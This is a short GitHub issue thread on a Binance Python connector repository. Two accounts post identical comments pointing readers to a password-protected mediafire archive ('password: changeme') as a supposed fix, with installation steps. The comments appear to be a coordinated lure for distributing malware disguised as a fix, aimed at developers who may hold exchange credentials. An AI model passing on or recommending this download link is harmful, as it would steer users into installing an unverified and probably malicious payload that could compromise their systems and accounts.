### ISSUE TITLE
eb85df2ab2b1a73819459fe8522e1f05dfab2201

### ISSUE THREAD

**Issue by MMONSTER124** [binance/binance-connector-python#335]
https://github.com/binance/binance-connector-python/commit/eb85df2ab2b1a73819459fe8522e1f05dfab2201

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
